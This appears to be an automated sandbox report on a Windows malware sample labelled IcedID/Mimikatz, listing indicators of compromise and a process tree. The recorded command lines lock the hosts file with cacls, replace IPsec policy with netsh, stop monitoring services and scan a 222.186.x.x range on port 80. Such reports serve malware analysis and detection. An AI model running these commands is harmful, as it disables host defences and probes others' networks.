net1.execmd.exesc.execmd.exezgbptmp.execmd.execmd.execmd.execmd.exeschtasks.exeschtasks.execmd.execmd.exenet.execmd.exenet1.exenet.execmd.exenetsh.exenet1.exenetsh.execacls.exenet.exenetsh.exenet1.execmd.exevykznlgit.execmd.execmd.execmd.exelebepbdpg.exenetsh.execmd.execmd.exenetsh.exenetsh.exewpcap.execmd.exenetsh.exenetsh.exenet1.execmd.exenetsh.execmd.exexcllyg.execmd.execmd.execmd.execacls.execacls.exenet.exenet1.execmd.exe2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exenet.exesc.exenet1.execmd.execacls.exenetsh.exenetsh.execmd.exenet1.exenet.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zgbptmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vykznlgit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lebepbdpg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcllyg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 8 cmd.exe 4288 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x0008000000023ca1-6.dat nsis_installer_2 behavioral2/files/0x0007000000023cb3-15.dat nsis_installer_1 behavioral2/files/0x0007000000023cb3-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
Processes:
fuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exezgbptmp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exedescription ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" zgbptmp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" zgbptmp.exe Key created \REGISTRY\USER\.DEFAULT\Software fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zgbptmp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" zgbptmp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" zgbptmp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zgbptmp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" fuwlsselp.exe -
Modifies registry class 14 IoCs
Processes:
zgbptmp.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" zgbptmp.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 2452 schtasks.exe 1620 schtasks.exe 4860 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
zgbptmp.exepid Process 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 660 660 660 660 660 660 660 660 660 660 660 660 660 660 660 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exepid Process 4260 2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exezgbptmp.exezgbptmp.exevfshost.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exedescription pid Process Token: SeDebugPrivilege 4260 2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4772 zgbptmp.exe Token: SeDebugPrivilege 5052 zgbptmp.exe Token: SeDebugPrivilege 3300 vfshost.exe Token: SeDebugPrivilege 4000 fuwlsselp.exe Token: SeDebugPrivilege 4484 fuwlsselp.exe Token: SeDebugPrivilege 4512 fuwlsselp.exe Token: SeDebugPrivilege 3012 fuwlsselp.exe Token: SeDebugPrivilege 4156 fuwlsselp.exe Token: SeDebugPrivilege 4448 fuwlsselp.exe Token: SeDebugPrivilege 4044 fuwlsselp.exe Token: SeDebugPrivilege 1924 fuwlsselp.exe Token: SeDebugPrivilege 1052 fuwlsselp.exe Token: SeDebugPrivilege 4880 fuwlsselp.exe Token: SeDebugPrivilege 4484 fuwlsselp.exe Token: SeDebugPrivilege 4312 fuwlsselp.exe Token: SeDebugPrivilege 3668 fuwlsselp.exe Token: SeDebugPrivilege 2072 fuwlsselp.exe Token: SeDebugPrivilege 1872 fuwlsselp.exe Token: SeDebugPrivilege 2396 fuwlsselp.exe Token: SeDebugPrivilege 3924 fuwlsselp.exe Token: SeDebugPrivilege 3532 fuwlsselp.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exezgbptmp.exezgbptmp.exexohudmc.exexcllyg.exezgbptmp.exezgbptmp.exepid Process 4260 2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe 4260 2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe 4772 zgbptmp.exe 4772 zgbptmp.exe 5052 zgbptmp.exe 5052 zgbptmp.exe 4176 xohudmc.exe 2196 xcllyg.exe 3792 zgbptmp.exe 3792 zgbptmp.exe 6444 zgbptmp.exe 6444 zgbptmp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.execmd.exezgbptmp.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 4260 wrote to memory of 8 4260 2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe 84 PID 4260 wrote to memory of 8 4260 2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe 84 PID 4260 wrote to memory of 8 4260 2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe 84 PID 8 wrote to memory of 4288 8 cmd.exe 86 PID 8 wrote to memory of 4288 8 cmd.exe 86 PID 8 wrote to memory of 4288 8 cmd.exe 86 PID 8 wrote to memory of 4772 8 cmd.exe 96 PID 8 wrote to memory of 4772 8 cmd.exe 96 PID 8 wrote to memory of 4772 8 cmd.exe 96 PID 5052 wrote to memory of 2604 5052 zgbptmp.exe 98 PID 5052 wrote to memory of 2604 5052 zgbptmp.exe 98 PID 5052 wrote to memory of 2604 5052 zgbptmp.exe 98 PID 2604 wrote to memory of 4832 2604 cmd.exe 100 PID 2604 wrote to memory of 4832 2604 cmd.exe 100 PID 2604 wrote to memory of 4832 2604 cmd.exe 100 PID 2604 wrote to memory of 2092 2604 cmd.exe 101 PID 2604 wrote to memory of 2092 2604 cmd.exe 101 PID 2604 wrote to memory of 2092 2604 cmd.exe 101 PID 2604 wrote to memory of 1508 2604 cmd.exe 103 PID 2604 wrote to memory of 1508 2604 cmd.exe 103 PID 2604 wrote to memory of 1508 2604 cmd.exe 103 PID 2604 wrote to memory of 1732 2604 cmd.exe 104 PID 2604 wrote to memory of 1732 2604 cmd.exe 104 PID 2604 wrote to memory of 1732 2604 cmd.exe 104 PID 2604 wrote to memory of 1540 2604 cmd.exe 106 PID 2604 wrote to memory of 1540 2604 cmd.exe 106 PID 2604 wrote to memory of 1540 2604 cmd.exe 106 PID 2604 wrote to memory of 1200 2604 cmd.exe 107 PID 2604 wrote to memory of 1200 2604 cmd.exe 107 PID 2604 wrote to memory of 1200 2604 cmd.exe 107 PID 5052 wrote to memory of 1756 5052 zgbptmp.exe 113 PID 5052 wrote to memory of 1756 5052 zgbptmp.exe 113 PID 5052 wrote to memory of 1756 5052 zgbptmp.exe 113 PID 5052 wrote to memory of 1512 5052 zgbptmp.exe 115 PID 5052 wrote to memory of 1512 5052 zgbptmp.exe 115 PID 5052 wrote to memory of 1512 5052 zgbptmp.exe 115 PID 5052 wrote to memory of 3144 5052 zgbptmp.exe 117 PID 5052 wrote to memory of 3144 5052 zgbptmp.exe 117 PID 5052 wrote to memory of 3144 5052 zgbptmp.exe 117 PID 5052 wrote to memory of 1864 5052 zgbptmp.exe 119 PID 5052 wrote to memory of 1864 5052 zgbptmp.exe 119 PID 5052 wrote to memory of 1864 5052 zgbptmp.exe 119 PID 1864 wrote to memory of 244 1864 cmd.exe 121 PID 1864 wrote to memory of 244 1864 cmd.exe 121 PID 1864 wrote to memory of 244 1864 cmd.exe 121 PID 244 wrote to memory of 3860 244 wpcap.exe 122 PID 244 wrote to memory of 3860 244 wpcap.exe 122 PID 244 wrote to memory of 3860 244 wpcap.exe 122 PID 3860 wrote to memory of 4048 3860 net.exe 124 PID 3860 wrote to memory of 4048 3860 net.exe 124 PID 3860 wrote to memory of 4048 3860 net.exe 124 PID 244 wrote to memory of 444 244 wpcap.exe 125 PID 244 wrote to memory of 444 244 wpcap.exe 125 PID 244 wrote to memory of 444 244 wpcap.exe 125 PID 444 wrote to memory of 3792 444 net.exe 127 PID 444 wrote to memory of 3792 444 net.exe 127 PID 444 wrote to memory of 3792 444 net.exe 127 PID 244 wrote to memory of 2156 244 wpcap.exe 128 PID 244 wrote to memory of 2156 244 wpcap.exe 128 PID 244 wrote to memory of 2156 244 wpcap.exe 128 PID 2156 wrote to memory of 4180 2156 net.exe 130 PID 2156 wrote to memory of 4180 2156 net.exe 130 PID 2156 wrote to memory of 4180 2156 net.exe 130 PID 244 wrote to memory of 4020 244 wpcap.exe 131
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2180
-
C:\Windows\TEMP\tlbykcrvn\vlcnek.exe"C:\Windows\TEMP\tlbykcrvn\vlcnek.exe"2⤵
- Executes dropped EXE
PID:324
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\qeqlilpn\zgbptmp.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4288
-
-
C:\Windows\qeqlilpn\zgbptmp.exeC:\Windows\qeqlilpn\zgbptmp.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4772
-
-
-
C:\Windows\qeqlilpn\zgbptmp.exeC:\Windows\qeqlilpn\zgbptmp.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4832
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1508
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1540
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:1200
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1756
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1512
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3144
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\unuiriqlb\iutaiczjy\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\unuiriqlb\iutaiczjy\wpcap.exeC:\Windows\unuiriqlb\iutaiczjy\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:244 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4048
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:444 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3792
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:4180
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:4020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:812
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4324 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4276 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2516
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1660
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1800 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4440
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\unuiriqlb\iutaiczjy\lebepbdpg.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\unuiriqlb\iutaiczjy\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:2124 -
